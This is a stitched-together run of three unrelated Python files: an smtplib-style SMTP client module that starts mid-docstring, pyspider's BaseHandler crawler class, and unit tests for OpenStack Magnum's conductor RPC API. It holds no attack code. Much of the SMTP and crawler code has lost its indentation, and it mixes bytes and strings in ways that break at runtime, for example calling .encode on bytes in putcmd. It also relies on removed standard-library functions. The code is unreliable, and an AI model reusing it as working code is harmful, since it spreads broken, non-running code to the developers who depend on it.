method called 'sendmail' that will do an entire mail transaction.
"""
file = None
helo_resp = None
ehlo_resp = None
does_esmtp = 0
def __init__(self, host='', port=25, bindto=None, logfile=None):
"""Initialize a new instance.
If specified, `host` is the name of the remote host to which to
connect. If specified, `port` specifies the port to which to connect.
By default, smtplib.SMTP_PORT is used. An SMTPConnectError is raised
if the specified `host` doesn't respond correctly. """
self.host = host
self.port = port
self._bindto = bindto
self.logfile = logfile
self.esmtp_features = {}
if host:
(code, msg) = self.connect(host, port, bindto)
if code != 220:
raise SMTPConnectError(code, msg)
def __repr__(self):
return "%s(%s, %d)" % (self.__class__.__name__, self.host, self.port)
def set_logfile(self, logfile):
self.logfile = logfile
def connect(self, host='localhost', port=0, bindto=None, retries=3):
"""Connect to a host on a given port.
If the hostname ends with a colon (`:`) followed by a number, and
there is no port specified, that suffix will be stripped off and the
number interpreted as the port number to use.
Note: This method is automatically invoked by __init__, if a host is
specified during instantiation.
"""
if not port and (host.find(':') == host.rfind(':')):
i = host.rfind(':')
if i >= 0:
host, port = host[:i], host[i+1:]
try: port = int(port)
except ValueError:
raise socket.error("nonnumeric port")
if not port:
port = SMTP_PORT
if self.logfile:
self.logfile.write('attempting SMTP.connect: %s %d\n' % (host, port))
msg = "getaddrinfo returns an empty list"
self.sock = None
for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
self.sock = socket.socket(af, socktype, proto)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if self.logfile:
self.logfile.write('SMTP.connect: %s %d\n' % (host, port))
if bindto:
self.sock.bind((bindto, socket.IPPORT_USERRESERVED))
self._bindto = bindto
self._connect(sa, retries)
except socket.error as msg:
if self.logfile:
self.logfile.write('SMTP.connect fail: %s %d\n' % (host, port))
if self.sock:
self.sock.close()
self.sock = None
continue
break
if not self.sock:
raise socket.error(msg)
(code, msg) = self.getreply()
if self.logfile:
self.logfile.write('SMTP.connect: %s %d\n' % (host, port))
return (code, msg)
    def _connect(self, addr, retries):
        retry = 0
        while retry < retries:
            retry += 1
            try:
                self.sock.connect(addr)
            except socket.error as err:
                if err.errno == ECONNREFUSED and retry < retries:  # might be busy
                    scheduler.sleep(2)
                    continue
                raise
            else:
                return
def send(self, s):
"""Send string to the server."""
if self.logfile:
            self.logfile.write('send: %r\n' % (s,))
if self.sock:
try:
self.sock.sendall(s)
except socket.error:
self.close()
raise SMTPServerDisconnected('Server not connected')
else:
raise SMTPServerDisconnected('please invoke connect() first')
def putcmd(self, cmd, args=""):
"""Send a command to the server."""
if args == "":
out = b'%s%s' % (cmd, CRLF)
else:
out = b'%s %s%s' % (cmd, args, CRLF)
self.send(out.encode("ascii"))
def getreply(self):
"""Get a reply from the server.
Returns a tuple consisting of:
- server response code (e.g. '250', or such, if all goes well)
Note: returns -1 if it can't read response code.
- server response string corresponding to response code (multiline
responses are converted to a single, multiline string).
Raises SMTPServerDisconnected if end-of-file is reached.
"""
resp=[]
if self.file is None:
self.file = self.sock.makefile('rb')
while 1:
try:
line = self.file.readline()
except IOError as err:
                if err.errno == EINTR:
continue
else:
raise
            if not line:
self.close()
raise SMTPServerDisconnected("Connection unexpectedly closed")
if self.logfile:
self.logfile.write('reply: %r\n' % (line,))
resp.append(line[4:].strip())
code=line[:3]
# Check that the error code is syntactically correct.
# Don't attempt to read a continuation line if it is broken.
try:
errcode = int(code)
except ValueError:
errcode = -1
break
# Check if multiline response.
if line[3:4]!="-":
break
errmsg = b"\n".join(resp)
if self.logfile:
self.logfile.write('reply: retcode (%s); Msg: %s\n' % (errcode,errmsg))
return errcode, errmsg
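    # For example, the two-line reply b"250-SIZE 35882577\r\n" then
    # b"250 OK\r\n" parses to (250, b"SIZE 35882577\nOK"): a "-" in column
    # four marks a continuation line, and the per-line texts are joined
    # with b"\n".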
def docmd(self, cmd, args=""):
"""Send a command, and return its response code."""
self.putcmd(cmd, args)
return self.getreply()
# std smtp commands
def helo(self, name=''):
"""SMTP 'helo' command.
Hostname to send for this command defaults to the FQDN of the local
host.
"""
name = name or self._bindto
if name:
self.putcmd(b"helo", name)
else:
self.putcmd(b"helo", socket.getfqdn())
(code,msg)=self.getreply()
self.helo_resp=msg
return (code,msg)
def ehlo(self, name=''):
""" SMTP 'ehlo' command.
Hostname to send for this command defaults to the FQDN of the local
host.
"""
self.esmtp_features = {}
name = name or self._bindto
if name:
self.putcmd(b"ehlo", name)
else:
self.putcmd(b"ehlo", socket.getfqdn())
(code,msg)=self.getreply()
# According to RFC1869 some (badly written)
# MTA's will disconnect on an ehlo. Toss an exception if
# that happens -ddm
if code == -1 and len(msg) == 0:
self.close()
raise SMTPServerDisconnected("Server not connected")
self.ehlo_resp=msg
if code != 250:
return (code,msg)
self.does_esmtp=1
#parse the ehlo response -ddm
        resp = self.ehlo_resp.decode("ascii", "replace").split('\n')
del resp[0]
for each in resp:
# To be able to communicate with as many SMTP servers as possible,
# we have to take the old-style auth advertisement into account,
# because:
# 1) Else our SMTP feature parser gets confused.
# 2) There are some servers that only advertise the auth methods we
# support using the old style.
auth_match = OLDSTYLE_AUTH.match(each)
if auth_match:
# This doesn't remove duplicates, but that's no problem
self.esmtp_features["auth"] = self.esmtp_features.get("auth", "") \
+ " " + auth_match.groups(0)[0]
continue
# RFC 1869 requires a space between ehlo keyword and parameters.
# It's actually stricter, in that only spaces are allowed between
# parameters, but were not going to check for that here. Note
# that the space isn't present if there are no parameters.
m=re.match(r'(?P<feature>[A-Za-z0-9][A-Za-z0-9\-]*)',each)
if m:
feature=m.group("feature").lower()
params=m.string[m.end("feature"):].strip()
if feature == "auth":
self.esmtp_features[feature] = self.esmtp_features.get(feature, "") \
+ " " + params
else:
self.esmtp_features[feature]=params
return (code,msg)
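    # For example, an EHLO response whose continuation lines are
    # "SIZE 35882577" and "AUTH PLAIN LOGIN" leaves esmtp_features as
    # {"size": "35882577", "auth": " PLAIN LOGIN"} (the "auth" value
    # accumulates with a leading space by construction).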
def has_extn(self, opt):
"""Does the server support a given SMTP service extension?"""
return opt.lower() in self.esmtp_features
def help(self, args=''):
"""SMTP 'help' command.
Returns help text from server."""
self.putcmd(b"help", args)
return self.getreply()
def rset(self):
"""SMTP 'rset' command -- resets session."""
return self.docmd("rset")
def noop(self):
"""SMTP 'noop' command -- doesn't do anything :>"""
return self.docmd("noop")
def mail(self,sender, options=None):
"""SMTP 'mail' command -- begins mail xfer session."""
optionlist = ''
if options and self.does_esmtp:
optionlist = ' ' + ' '.join(options)
self.putcmd(b"mail", b"FROM:%s%s" % (quoteaddr(sender) ,optionlist))
return self.getreply()
def rcpt(self,recip, options=None):
"""SMTP 'rcpt' command -- indicates 1 recipient for this mail."""
optionlist = ''
if options and self.does_esmtp:
optionlist = ' ' + ' '.join(options)
self.putcmd(b"rcpt", b"TO:%s%s" % (quoteaddr(recip),optionlist))
return self.getreply()
def data(self,msg):
"""SMTP 'DATA' command -- sends message data to server.
Automatically quotes lines beginning with a period per rfc821.
Raises SMTPDataError if there is an unexpected reply to the
DATA command; the return value from this method is the final
response code received when the all data is sent.
"""
self.putcmd(b"data")
(code,repl)=self.getreply()
if self.logfile:
self.logfile.write("data: %s %s\n" % (code,repl))
if code != 354:
raise SMTPDataError(code,repl)
else:
            if isinstance(msg, bytes):
                msg = msg.decode("utf-8")
            q = quotedata(msg).encode("utf-8")
            if q[-2:] != CRLF:
                q += CRLF
            q += DOTCRLF
            self.send(q)
(code, msg)=self.getreply()
if self.logfile:
self.logfile.write("data: %s %r\n" % (code,msg))
return (code,msg)
def verify(self, address):
"""SMTP 'verify' command -- checks for address validity."""
self.putcmd(b"vrfy", quoteaddr(address))
return self.getreply()
# a.k.a.
vrfy=verify
def expn(self, address):
"""SMTP 'verify' command -- checks for address validity."""
self.putcmd(b"expn", quoteaddr(address))
return self.getreply()
# some useful methods
def login(self, user, password):
"""Log in on an SMTP server that requires authentication.
The arguments are:
- user: The user name to authenticate with.
- password: The password for the authentication.
If there has been no previous EHLO or HELO command this session, this
method tries ESMTP EHLO first.
This method will return normally if the authentication was successful.
This method may raise the following exceptions:
SMTPHeloError The server didn't reply properly to
the helo greeting.
SMTPAuthenticationError The server didn't accept the username/
password combination.
SMTPException No suitable authentication method was
found.
"""
        def encode_cram_md5(challenge, user, password):
            challenge = base64.decodebytes(challenge)
            digest = hmac.HMAC(password.encode("ascii"), challenge, "md5").hexdigest()
            return encode_base64(user + " " + digest, eol="")
        def encode_plain(user, password):
            return encode_base64("%s\0%s\0%s" % (user, user, password), eol="")
        AUTH_PLAIN = "PLAIN"
        AUTH_CRAM_MD5 = "CRAM-MD5"
        AUTH_LOGIN = "LOGIN"
if self.helo_resp is None and self.ehlo_resp is None:
if not (200 <= self.ehlo()[0] <= 299):
(code, resp) = self.helo()
if not (200 <= code <= 299):
raise SMTPHeloError(code, resp)
if not self.has_extn("auth"):
raise SMTPException("SMTP AUTH extension not supported by server.")
# Authentication methods the server supports:
authlist = self.esmtp_features["auth"].split()
# List of authentication methods we support: from preferred to
# less preferred methods. Except for the purpose of testing the weaker
# ones, we prefer stronger methods like CRAM-MD5:
preferred_auths = [AUTH_CRAM_MD5, AUTH_PLAIN, AUTH_LOGIN]
# Determine the authentication method we'll use
authmethod = None
for method in preferred_auths:
if method in authlist:
authmethod = method
break
if authmethod == AUTH_CRAM_MD5:
(code, resp) = self.docmd("AUTH", AUTH_CRAM_MD5)
if code == 503:
# 503 == 'Error: already authenticated'
return (code, resp)
(code, resp) = self.docmd(encode_cram_md5(resp, user, password))
elif authmethod == AUTH_PLAIN:
(code, resp) = self.docmd("AUTH",
AUTH_PLAIN + " " + encode_plain(user, password))
elif authmethod == AUTH_LOGIN:
(code, resp) = self.docmd("AUTH",
"%s %s" % (AUTH_LOGIN, encode_base64(user, eol="")))
if code != 334:
raise SMTPAuthenticationError(code, resp)
(code, resp) = self.docmd(encode_base64(password, eol=""))
        elif authmethod is None:
raise SMTPException("No suitable authentication method found.")
if code not in [235, 503]:
# 235 == 'Authentication successful'
# 503 == 'Error: already authenticated'
raise SMTPAuthenticationError(code, resp)
return (code, resp)
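    # Worked example: encode_plain("bob", "s3cret") base64-encodes the SASL
    # PLAIN string "bob\0bob\0s3cret" (authorization id, authentication id,
    # password), yielding "Ym9iAGJvYgBzM2NyZXQ=", which is what follows
    # "AUTH PLAIN " on the wire.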
def starttls(self, keyfile = None, certfile = None):
"""Puts the connection to the SMTP server into TLS mode.
If the server supports TLS, this will encrypt the rest of the SMTP
session. If you provide the keyfile and certfile parameters,
the identity of the SMTP server and client can be checked. This,
however, depends on whether the socket module really checks the
certificates.
"""
(resp, reply) = self.docmd("STARTTLS")
if resp == 220:
            sslobj = ssl.wrap_socket(self.sock, keyfile=keyfile, certfile=certfile)
self.sock = SSLFakeSocket(self.sock, sslobj)
self.file = SSLFakeFile(sslobj)
return (resp, reply)
def sendmail(self, from_addr, to_addrs, msg, mail_options=None, rcpt_options=None):
"""This command performs an entire mail transaction.
The arguments are::
:from_addr: The address sending this mail.
:to_addrs: A list of addresses to send this mail to. A bare
string will be treated as a list with 1 address.
:msg: The message to send.
:mail_options: List of ESMTP options (such as 8bitmime) for the
mail command.
:rcpt_options: List of ESMTP options (such as DSN commands) for
all the rcpt commands.
If there has been no previous EHLO or HELO command this session, this
method tries ESMTP EHLO first. If the server does ESMTP, message size
and each of the specified options will be passed to it. If EHLO
fails, HELO will be tried and ESMTP options suppressed.
This method will return normally if the mail is accepted for at least
one recipient. It returns a dictionary, with one entry for each
recipient that was refused. Each entry contains a tuple of the SMTP
error code and the accompanying error message sent by the server.
This method may raise the following exceptions::
:SMTPHeloError: The server didn't reply properly to
the helo greeting.
:SMTPRecipientsRefused: The server rejected ALL recipients
(no mail was sent).
:SMTPSenderRefused: The server didn't accept the from_addr.
:SMTPDataError: The server replied with an unexpected
error code (other than a refusal of
a recipient).
Note: the connection will be open even after an exception is raised.
Example::
>>> import smtplib
>>> s=smtplib.SMTP("localhost")
>>> tolist=["one@one.org","two@two.org","three@three.org","four@four.org"]
>>> msg = '''\\
... From: Me@my.org
... Subject: testin'...
...
... This is a test '''
>>> s.sendmail("me@my.org",tolist,msg)
{ "three@three.org" : ( 550 ,"User unknown" ) }
>>> s.quit()
In the above example, the message was accepted for delivery to three
of the four addresses, and one was rejected, with the error code
550. If all addresses are accepted, then the method will return an
empty dictionary.
"""
if self.helo_resp is None and self.ehlo_resp is None:
if not (200 <= self.ehlo()[0] <= 299):
(code,resp) = self.helo()
if not (200 <= code <= 299):
raise SMTPHeloError(code, resp)
esmtp_opts = []
if self.does_esmtp:
if self.has_extn('size'):
esmtp_opts.append("size={0:d}".format(len(msg)))
if mail_options:
for option in mail_options:
esmtp_opts.append(option)
(code,resp) = self.mail(from_addr, esmtp_opts)
if code != 250:
self.rset()
raise SMTPSenderRefused(code, resp, from_addr)
senderrs={}
if isinstance(to_addrs, str):
to_addrs = [to_addrs]
for each in to_addrs:
(code,resp)=self.rcpt(each, rcpt_options)
if (code != 250) and (code != 251):
senderrs[each]=(code,resp)
if len(senderrs)==len(to_addrs):
# the server refused all our recipients
self.rset()
raise SMTPRecipientsRefused(senderrs)
(code,resp) = self.data(msg)
if code != 250:
self.rset()
raise SMTPDataError(code, resp)
#if we got here then somebody got our mail
return senderrs
def close(self):
"""Close the connection to the SMTP server."""
if self.file:
self.file.close()
self.file = None
if self.sock:
self.sock.close()
self.sock = None
def quit(self):
"""Terminate the SMTP session."""
rv = self.docmd("QUIT")
self.close()
return rv
class Envelope(object):
"""Envelope([mail_from], [recpt_list])
An envelope holds an SMTP conversation from the MAIL FROM command to the end of
a DATA part. It may be re-sent by calling the 'send()' method with an SMTP
connection object. The message body can be parsed by passing in an 'email'
parser object to the 'parse()' method."""
def __init__ (self, mail_from=None, rcpt_to=None):
self.mail_from = mail_from
self.rcpt_to = rcpt_to or []
self.data = None
self.message = None
def __repr__ (self):
return "Envelope(%r, %r)" % (self.mail_from, self.rcpt_to)
def __str__(self):
s = ["MAIL FROM: %s" % (self.mail_from,)]
for rcpt in self.rcpt_to:
s.append("RCPT TO: %s" % (rcpt))
s.append("\n")
if self.message:
s.append(str(self.message))
elif self.data:
s.append(self.data.getvalue())
else:
s.append("<no data!>")
return "\n".join(s)
def has_data(self):
"""has_data() is true if there is data or message."""
if self.data:
return self.data.tell()
elif self.message:
return len(self.message)
else:
return 0
    def write(self, text):
        """write(text)
        Writes text to the message body."""
        if self.data is None:
            self.data = BytesIO()
        if isinstance(text, str):
            text = text.encode("utf-8")
        self.data.write(text)
    def writeln(self, text):
        """writeln(text)
        Writes text to the message body, adding a newline."""
        self.write(text)
        self.write(b"\n")
def set_from(self, frm):
"""set_from(from_address)
Sets the MAIL FROM address for this Envelope."""
self.mail_from = frm
def add_rcpt(self, rcpt):
"""add_rcpt(recipient)
Adds a new recipient to the RCPT list."""
self.rcpt_to.append(rcpt)
def parse_data(self, parser):
"""parse_data(parser)
Instructs the Envelope to convert its raw 'data' attribute to a 'message'
attribute using the supplied parser object. A 'message' attribute is an
'email' package Message tree."""
if self.data is not None:
self.data.seek(0,0)
# parser should be email.Parser.Parser object, or subclass thereof.
self.message = parser.parse(self.data)
self.data.close()
if self.message:
self.data = None
def send(self, smtp, mail_options=None, rcpt_options=None):
"""Mails this envelope using the supplied SMTP client object."""
if self.message:
return smtp.sendmail(self.mail_from, self.rcpt_to, self.message.as_string(), mail_options, rcpt_options)
elif self.data:
return smtp.sendmail(self.mail_from, self.rcpt_to, self.data.getvalue(), mail_options, rcpt_options)
else:
body = "From: %s\nTo: %s\n\nEnvelope message." % (self.mail_from, ", ".join(self.rcpt_to))
return smtp.sendmail(self.mail_from, self.rcpt_to, body, mail_options, rcpt_options)
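# A minimal usage sketch (addresses, host, and port are illustrative
# assumptions; note that write() feeds text into a BytesIO buffer, which
# follows this module's Python 2 lineage):
#
# >>> env = Envelope("me@example.org", ["you@example.org"])
# >>> env.writeln("Subject: hello")
# >>> env.writeln("")
# >>> env.writeln("A short test body.")
# >>> env.send(get_mailer("localhost", 9025))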
def get_mailer(host="", port=SMTP_PORT, logfile=None):
return SMTP(str(host), int(port), logfile=logfile)
def test(argv):
def prompt(prompt):
return input(prompt+": ")
#fromaddr = prompt("From")
#toaddrs = prompt("To")
#mailhost = prompt("mailhost")
fromaddr = "keith@dartworks.biz"
toaddrs = "keith@dartworks.biz"
mailhost = "localhost"
#print ("Enter message, end with empty line:")
msg = 'From: %s\nTo: %s\nSubject: test message\n\n' % (fromaddr, toaddrs)
#while 1:
# line = raw_input("> ")
# if not line:
# break
# msg = msg + line
msg = msg + "A message \n\n.\n"
server = SMTP()
server.connect(mailhost, 9025)
server.sendmail(fromaddr, toaddrs.split(","), msg)
server.quit()
# Test the sendmail method, which tests most of the others.
# Note: This always sends to localhost.
if __name__ == '__main__':
import sys
test(sys.argv)
| |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-02-16 23:12:48
import sys
import inspect
import functools
import fractions
import six
from six import add_metaclass, iteritems
from pyspider.libs.log import LogFormatter
from pyspider.libs.url import quote_chinese, _build_url, _encode_params, _encode_multipart_formdata
from pyspider.libs.utils import md5string, hide_me, pretty_unicode
from pyspider.libs.ListIO import ListO
from pyspider.libs.response import rebuild_response
from pyspider.libs.pprint import pprint
class ProcessorResult(object):
"""The result and logs producted by a callback"""
def __init__(self, result, follows, messages, logs, exception, extinfo):
self.result = result
self.follows = follows
self.messages = messages
self.logs = logs
self.exception = exception
self.extinfo = extinfo
def rethrow(self):
"""rethrow the exception"""
if self.exception:
raise self.exception
def logstr(self):
"""handler the log records to formatted string"""
result = []
formatter = LogFormatter(color=False)
for record in self.logs:
if isinstance(record, six.string_types):
result.append(pretty_unicode(record))
else:
if record.exc_info:
a, b, tb = record.exc_info
tb = hide_me(tb, globals())
record.exc_info = a, b, tb
result.append(pretty_unicode(formatter.format(record)))
result.append(u'\n')
return u''.join(result)
def catch_status_code_error(func):
"""
A non-200 response is regarded as a fetch failure and is not passed to the callback.
Use this decorator to override this behavior.
"""
func._catch_status_code_error = True
return func
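# A minimal usage sketch (the callback name is an illustrative assumption):
# a decorated callback still receives non-200 responses instead of the
# fetch being treated as failed.
#
# @catch_status_code_error
# def error_page(self, response):
#     ...  # runs even when response.status_code != 200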
def not_send_status(func):
"""
Do not send the process status package back to the scheduler.
It is used by callbacks like on_message, on_result, etc.
"""
@functools.wraps(func)
def wrapper(self, response, task):
self._extinfo['not_send_status'] = True
function = func.__get__(self, self.__class__)
return self._run_func(function, response, task)
return wrapper
def config(_config=None, **kwargs):
"""
A decorator for setting the default kwargs of `BaseHandler.crawl`.
Any self.crawl call that uses the decorated method as its callback will use this config.
"""
if _config is None:
_config = {}
_config.update(kwargs)
def wrapper(func):
func._config = _config
return func
return wrapper
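# A minimal usage sketch (values are illustrative): every self.crawl() call
# that uses index_page as its callback will default to age=10 days.
#
# @config(age=10 * 24 * 60 * 60)
# def index_page(self, response):
#     ...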
class NOTSET(object):
pass
def every(minutes=NOTSET, seconds=NOTSET):
"""
The decorated method will be called every `minutes` minutes or `seconds` seconds.
"""
def wrapper(func):
@functools.wraps(func)
def on_cronjob(self, response, task):
if (
response.save
and 'tick' in response.save
and response.save['tick'] % (minutes * 60 + seconds) != 0
):
return None
function = func.__get__(self, self.__class__)
return self._run_func(function, response, task)
on_cronjob.is_cronjob = True
on_cronjob.tick = minutes * 60 + seconds
return on_cronjob
if inspect.isfunction(minutes):
func = minutes
minutes = 1
seconds = 0
return wrapper(func)
if minutes is NOTSET:
if seconds is NOTSET:
minutes = 1
seconds = 0
else:
minutes = 0
if seconds is NOTSET:
seconds = 0
return wrapper
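# A minimal usage sketch (the interval is illustrative): on_start is driven
# by the scheduler's tick once every 24 hours.
#
# @every(minutes=24 * 60)
# def on_start(self):
#     self.crawl('http://example.com/', callback=self.index_page)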
class BaseHandlerMeta(type):
def __new__(cls, name, bases, attrs):
cron_jobs = []
min_tick = 0
for each in attrs.values():
if inspect.isfunction(each) and getattr(each, 'is_cronjob', False):
cron_jobs.append(each)
min_tick = fractions.gcd(min_tick, each.tick)
newcls = type.__new__(cls, name, bases, attrs)
newcls._cron_jobs = cron_jobs
newcls._min_tick = min_tick
return newcls
@add_metaclass(BaseHandlerMeta)
class BaseHandler(object):
"""
BaseHandler for all scripts.
`BaseHandler.run_task` is the main method to handle a task.
"""
crawl_config = {}
project_name = None
_cron_jobs = []
_min_tick = 0
__env__ = {'not_inited': True}
def _reset(self):
"""
reset before each task
"""
self._extinfo = {}
self._messages = []
self._follows = []
self._follows_keys = set()
def _run_func(self, function, *arguments):
"""
Run the callback function with the number of arguments it accepts.
"""
args, varargs, keywords, defaults = inspect.getargspec(function)
return function(*arguments[:len(args) - 1])
def _run_task(self, task, response):
"""
Find the callback specified by `task['callback']` and run it,
raising a status error first if needed.
"""
self._reset()
if isinstance(response, dict):
response = rebuild_response(response)
process = task.get('process', {})
callback = process.get('callback', '__call__')
if not hasattr(self, callback):
raise NotImplementedError("self.%s() not implemented!" % callback)
function = getattr(self, callback)
if not getattr(function, '_catch_status_code_error', False):
response.raise_for_status()
return self._run_func(function, response, task)
def run_task(self, module, task, response):
"""
Process the task, capturing exceptions and logs, and return a `ProcessorResult` object.
"""
logger = module.logger
result = None
exception = None
stdout = sys.stdout
self.task = task
self.response = response
try:
sys.stdout = ListO(module.log_buffer)
result = self._run_task(task, response)
if inspect.isgenerator(result):
for r in result:
self._run_func(self.on_result, r, response, task)
else:
self._run_func(self.on_result, result, response, task)
except Exception as e:
logger.exception(e)
exception = e
finally:
self.task = None
self.response = None
sys.stdout = stdout
follows = self._follows
messages = self._messages
logs = list(module.log_buffer)
extinfo = self._extinfo
module.log_buffer[:] = []
return ProcessorResult(result, follows, messages, logs, exception, extinfo)
def _crawl(self, url, **kwargs):
"""
The real crawl API:
check kwargs and repack them into the schedule/fetch/process sub-dicts.
"""
task = {}
if kwargs.get('callback'):
callback = kwargs['callback']
if isinstance(callback, six.string_types) and hasattr(self, callback):
func = getattr(self, callback)
elif six.callable(callback) and six.get_method_self(callback) is self:
func = callback
kwargs['callback'] = func.__name__
else:
raise NotImplementedError("self.%s() not implemented!" % callback)
if hasattr(func, '_config'):
for k, v in iteritems(func._config):
kwargs.setdefault(k, v)
for k, v in iteritems(self.crawl_config):
kwargs.setdefault(k, v)
url = quote_chinese(_build_url(url.strip(), kwargs.get('params')))
if kwargs.get('files'):
assert isinstance(
kwargs.get('data', {}), dict), "data must be a dict when using with files!"
content_type, data = _encode_multipart_formdata(kwargs.get('data', {}),
kwargs.get('files', {}))
kwargs.setdefault('headers', {})
kwargs['headers']['Content-Type'] = content_type
kwargs['data'] = data
if kwargs.get('data'):
kwargs['data'] = _encode_params(kwargs['data'])
if kwargs.get('data'):
kwargs.setdefault('method', 'POST')
schedule = {}
for key in ('priority', 'retries', 'exetime', 'age', 'itag', 'force_update'):
if key in kwargs and kwargs[key] is not None:
schedule[key] = kwargs[key]
task['schedule'] = schedule
fetch = {}
for key in (
'method',
'headers',
'data',
'timeout',
'allow_redirects',
'cookies',
'proxy',
'etag',
'last_modifed',
'save',
'js_run_at',
'js_script',
'load_images',
'fetch_type'
):
if key in kwargs and kwargs[key] is not None:
fetch[key] = kwargs[key]
task['fetch'] = fetch
process = {}
for key in ('callback', ):
if key in kwargs and kwargs[key] is not None:
process[key] = kwargs[key]
task['process'] = process
task['project'] = self.project_name
task['url'] = url
task['taskid'] = task.get('taskid') or self.get_taskid(task)
cache_key = "%(project)s:%(taskid)s" % task
if cache_key not in self._follows_keys:
self._follows_keys.add(cache_key)
self._follows.append(task)
return task
def get_taskid(self, task):
'''Generate a taskid from task information; md5(url) by default. Override me.'''
return md5string(task['url'])
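# A minimal override sketch (illustrative; assumes POST payloads should be
# distinguished): include the request body in the taskid so the same URL
# with different data yields different tasks.
#
# import json
# def get_taskid(self, task):
#     return md5string(task['url'] +
#                      json.dumps(task['fetch'].get('data', '')))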
# apis
def crawl(self, url, **kwargs):
'''
available params:
url
callback
method
params
data
files
headers
timeout
allow_redirects
cookies
proxy
etag
last_modifed
fetch_type
js_run_at
js_script
load_images
priority
retries
exetime
age
itag
save
taskid
full documents: http://pyspider.readthedocs.org/en/latest/apis/self.crawl/
'''
if isinstance(url, six.string_types):
return self._crawl(url, **kwargs)
elif hasattr(url, "__iter__"):
result = []
for each in url:
result.append(self._crawl(each, **kwargs))
return result
def is_debugger(self):
"""Return true if running in debugger"""
return self.__env__.get('debugger')
def send_message(self, project, msg, url='data:,on_message'):
"""Send messages to other project."""
self._messages.append((project, msg, url))
def on_message(self, project, msg):
"""Receive message from other project, override me."""
pass
def on_result(self, result):
"""Receiving returns from other callback, override me."""
if not result:
return
assert self.task, "on_result can't be called outside a callback."
if self.is_debugger():
pprint(result)
if self.__env__.get('result_queue'):
self.__env__['result_queue'].put((self.task, result))
@not_send_status
def _on_message(self, response):
project, msg = response.save
return self.on_message(project, msg)
@not_send_status
def _on_cronjob(self, response, task):
for cronjob in self._cron_jobs:
function = cronjob.__get__(self, self.__class__)
self._run_func(function, response, task)
@not_send_status
def _on_get_info(self, response, task):
"""Sending runtime infomation about this script."""
result = {}
assert response.save
for each in response.save:
if each == 'min_tick':
result[each] = self._min_tick
self.crawl('data:,on_get_info', save=result)
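# A minimal project-script sketch built on BaseHandler (the URL, selector,
# and config values are illustrative assumptions; response.doc assumes the
# pyquery-backed response helper):
#
# class Handler(BaseHandler):
#     crawl_config = {}
#
#     @every(minutes=24 * 60)
#     def on_start(self):
#         self.crawl('http://example.com/', callback=self.index_page)
#
#     @config(age=10 * 24 * 60 * 60)
#     def index_page(self, response):
#         return {'url': response.url, 'title': response.doc('title').text()}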
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit Tests for :py:class:`magnum.conductor.rpcapi.API`.
"""
import copy
import mock
from magnum.conductor import api as conductor_rpcapi
from magnum.tests.unit.db import base
from magnum.tests.unit.db import utils as dbutils
class RPCAPITestCase(base.DbTestCase):
def setUp(self):
super(RPCAPITestCase, self).setUp()
self.fake_bay = dbutils.get_test_bay(driver='fake-driver')
self.fake_container = dbutils.get_test_container(driver='fake-driver')
self.fake_pod = dbutils.get_test_pod(driver='fake-driver')
self.fake_rc = dbutils.get_test_rc(driver='fake-driver')
self.fake_service = dbutils.get_test_service(driver='fake-driver')
self.fake_x509keypair = dbutils.get_test_x509keypair(
driver='fake-driver')
def _test_rpcapi(self, method, rpc_method, **kwargs):
rpcapi_cls = kwargs.pop('rpcapi_cls', conductor_rpcapi.API)
rpcapi = rpcapi_cls(topic='fake-topic')
expected_retval = 'hello world' if rpc_method == 'call' else None
expected_topic = 'fake-topic'
if 'host' in kwargs:
expected_topic += ".%s" % kwargs['host']
target = {
"topic": expected_topic,
"version": kwargs.pop('version', 1.0)
}
expected_msg = copy.deepcopy(kwargs)
self.fake_args = None
self.fake_kwargs = None
def _fake_prepare_method(*args, **kwargs):
for kwd in kwargs:
self.assertEqual(kwargs[kwd], target[kwd])
return rpcapi._client
def _fake_rpc_method(*args, **kwargs):
self.fake_args = args
self.fake_kwargs = kwargs
if expected_retval:
return expected_retval
with mock.patch.object(rpcapi._client, "prepare") as mock_prepared:
mock_prepared.side_effect = _fake_prepare_method
with mock.patch.object(rpcapi._client, rpc_method) as mock_method:
mock_method.side_effect = _fake_rpc_method
retval = getattr(rpcapi, method)(**kwargs)
self.assertEqual(retval, expected_retval)
expected_args = [None, method, expected_msg]
for arg, expected_arg in zip(self.fake_args, expected_args):
self.assertEqual(arg, expected_arg)
def test_bay_create(self):
self._test_rpcapi('bay_create',
'call',
version='1.0',
bay=self.fake_bay,
bay_create_timeout=15)
def test_bay_delete(self):
self._test_rpcapi('bay_delete',
'call',
version='1.0',
uuid=self.fake_bay['uuid'])
self._test_rpcapi('bay_delete',
'call',
version='1.1',
uuid=self.fake_bay['name'])
def test_bay_update(self):
self._test_rpcapi('bay_update',
'call',
version='1.1',
bay=self.fake_bay['name'])
def test_service_create(self):
self._test_rpcapi('service_create',
'call',
version='1.0',
service=self.fake_service)
def test_service_update(self):
self._test_rpcapi('service_update',
'call',
version='1.0',
service=self.fake_service)
def test_service_delete(self):
self._test_rpcapi('service_delete',
'call',
version='1.0',
uuid=self.fake_service['uuid'])
self._test_rpcapi('service_delete',
'call',
version='1.1',
uuid=self.fake_service['name'])
def test_pod_create(self):
self._test_rpcapi('pod_create',
'call',
version='1.0',
pod=self.fake_pod)
def test_pod_update(self):
self._test_rpcapi('pod_update',
'call',
version='1.1',
pod=self.fake_pod['name'])
def test_pod_delete(self):
self._test_rpcapi('pod_delete',
'call',
version='1.0',
uuid=self.fake_pod['uuid'])
self._test_rpcapi('pod_delete',
'call',
version='1.1',
uuid=self.fake_pod['name'])
def test_rc_create(self):
self._test_rpcapi('rc_create',
'call',
version='1.0',
rc=self.fake_rc)
def test_rc_update(self):
self._test_rpcapi('rc_update',
'call',
version='1.0',
rc=self.fake_rc)
def test_rc_delete(self):
self._test_rpcapi('rc_delete',
'call',
version='1.0',
uuid=self.fake_rc['uuid'])
self._test_rpcapi('rc_delete',
'call',
version='1.1',
uuid=self.fake_rc['name'])
def test_container_create(self):
self._test_rpcapi('container_create',
'call',
version='1.0',
container=self.fake_container)
